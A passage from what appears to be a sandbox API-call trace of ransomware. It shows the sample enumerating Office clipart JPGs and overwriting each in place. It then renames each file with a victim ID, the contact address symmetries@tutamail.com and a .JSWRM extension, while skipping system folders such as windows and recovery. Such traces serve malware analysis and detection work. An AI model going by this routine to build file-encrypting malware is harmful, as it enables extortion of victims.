lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.642] CloseHandle (hObject=0x314) returned 1 [0090.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0090.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0090.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0090.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0090.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0090.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0090.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384862.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384862.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0090.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0090.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0090.644] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b79, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0384885.JPG", cAlternateFileName="")) returned 1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2=".") returned 1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="..") returned 1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="...") returned 1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="windows") returned -1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="recovery") returned -1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="perflogs") returned -1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="documents and settings") returned 1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.644] lstrcmpiW (lpString1="J0384885.JPG", lpString2="system volume information") returned -1 [0090.645] lstrcmpiW (lpString1="J0384885.JPG", lpString2="msocache") returned -1 [0090.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0090.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384885.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384885.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384885.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0090.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0090.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384885.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384885.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384885.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0090.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0090.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0090.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384885.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.646] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=97145) returned 1 [0090.646] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17b70) returned 0x24d210 [0090.646] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17b70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x17b70, lpOverlapped=0x0) returned 1 [0090.654] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.654] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17b70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x17b70, lpOverlapped=0x0) returned 1 [0090.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.656] CloseHandle (hObject=0x314) returned 1 [0090.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0090.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0090.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0090.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0090.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0090.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0090.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384885.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384885.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0090.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0090.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0090.657] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14033, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0384888.JPG", cAlternateFileName="")) returned 1 [0090.657] lstrcmpiW (lpString1="J0384888.JPG", lpString2=".") returned 1 [0090.657] lstrcmpiW (lpString1="J0384888.JPG", lpString2="..") returned 1 [0090.657] lstrcmpiW (lpString1="J0384888.JPG", lpString2="...") returned 1 [0090.657] lstrcmpiW (lpString1="J0384888.JPG", lpString2="windows") returned -1 [0090.657] lstrcmpiW (lpString1="J0384888.JPG", lpString2="recovery") returned -1 [0090.658] lstrcmpiW (lpString1="J0384888.JPG", lpString2="perflogs") returned -1 [0090.658] lstrcmpiW (lpString1="J0384888.JPG", lpString2="documents and settings") returned 1 [0090.658] lstrcmpiW (lpString1="J0384888.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.658] lstrcmpiW (lpString1="J0384888.JPG", lpString2="system volume information") returned -1 [0090.658] lstrcmpiW (lpString1="J0384888.JPG", lpString2="msocache") returned -1 [0090.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0090.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384888.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384888.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384888.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0090.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0090.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384888.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384888.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384888.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0090.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0090.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0090.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0090.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384888.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.659] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=81971) returned 1 [0090.659] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14030) returned 0x24d210 [0090.660] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x14030, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x14030, lpOverlapped=0x0) returned 1 [0090.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.667] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x14030, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x14030, lpOverlapped=0x0) returned 1 [0090.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.668] CloseHandle (hObject=0x314) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0090.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0090.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0090.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0090.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0090.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384888.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384888.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0090.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0090.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0090.669] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd8f6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0384895.JPG", cAlternateFileName="")) returned 1 [0090.669] lstrcmpiW (lpString1="J0384895.JPG", lpString2=".") returned 1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="..") returned 1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="...") returned 1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="windows") returned -1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="recovery") returned -1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="perflogs") returned -1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="documents and settings") returned 1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="system volume information") returned -1 [0090.670] lstrcmpiW (lpString1="J0384895.JPG", lpString2="msocache") returned -1 [0090.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0090.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384895.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384895.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384895.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0090.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384895.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384895.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384895.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0090.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0090.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0090.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.671] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=55542) returned 1 [0090.671] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd8f0) returned 0x24d210 [0090.671] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xd8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xd8f0, lpOverlapped=0x0) returned 1 [0090.685] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.685] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xd8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xd8f0, lpOverlapped=0x0) returned 1 [0090.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.686] CloseHandle (hObject=0x314) returned 1 [0090.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0090.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0090.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0090.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0090.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0090.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0090.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.687] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384895.jpg"), lpNewFileName="C:\\Program Files\\Microsoft 